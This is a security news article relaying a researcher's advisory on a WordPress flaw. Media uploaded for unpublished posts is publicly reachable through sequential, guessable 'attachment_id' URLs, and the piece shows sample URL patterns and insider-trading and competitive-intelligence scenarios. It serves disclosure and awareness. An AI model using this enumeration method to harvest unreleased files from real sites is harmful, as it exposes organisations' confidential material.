A minor flaw in WordPress has much wider implications - it potentially exposes an organisation to data leakage. If a company uploads additional media to support a draft blog, while the text may be protected, the supporting material is open to discovery. While many may deem the risk as low, it potentially leaves a listed company at risk of insider trading, or a design company to copyright theft.
WhiteHat Security’s Technical Evangelist Robert Hansen has outlined how this flaw works and what the implications are. Please see the full text below.
Information Leakage in WordPress
WordPress suffers from a fairly minor flaw that may be used by attackers without much difficulty. WordPress flaws have been numerous over the years - everything from command injection or SQL injection to XSS (cross-site scripting) and CSRF (cross site request forgery). One of my favourite issues has always been information leakage because it's the one that's always marked as low severity and that no one ever takes seriously. That said, it's still an exploit that could be disastrous in some circumstances.
WordPress has an upload process for media that is separate from the blog posting process. As such they aren't governed by the same rules concerning authorisation. Once something is uploaded as media it is instantly visible on the site, regardless of whether the blog post has been posted yet or not.
Additionally, the URLs used by the blog are extremely easy to brute force because they are always larger than the last attachment_id by some amount. The actual number is based on how many posts are in the database and not just on media, so it does take a tiny bit of work to know when to stop looking. But the URLs are consistently like this:
/?attachment_id=4
/?attachment_id=130
/?attachment_id=131
/?attachment_id=249
Now you're asking yourself, so what? The problem is that because the timing between the media and the blog post isn't identical you can end up in a race condition with the content. For instance, let's say you run a publicly traded company and you are about to release your earnings report on your blog. You may upload a PDF of the earnings report a day or multiple days in advance to make sure everything is perfect and ready to go when you announce. In this case the adversary can guess the URL for the PDF of your earnings report and download it potentially days in advance. This would allow them to trade in advance of your company's earning reports.
Another example is where a blog post is internally contentious and needs a lot of editing. It may take months for a big company to decide that a post is ready to go. But in that timeframe an attacker may identify the cited uploaded media - images, movies, PDF documents, Word documents, Excel spreadsheets, HTML and so on. This can give an adversary a great deal of information before you're ready to disclose it. This can be used for anti-competitive practices, or simply to predict the features of the next gadget your company is producing.
A minor issue, but definitely one to be aware of if you’re using WordPress.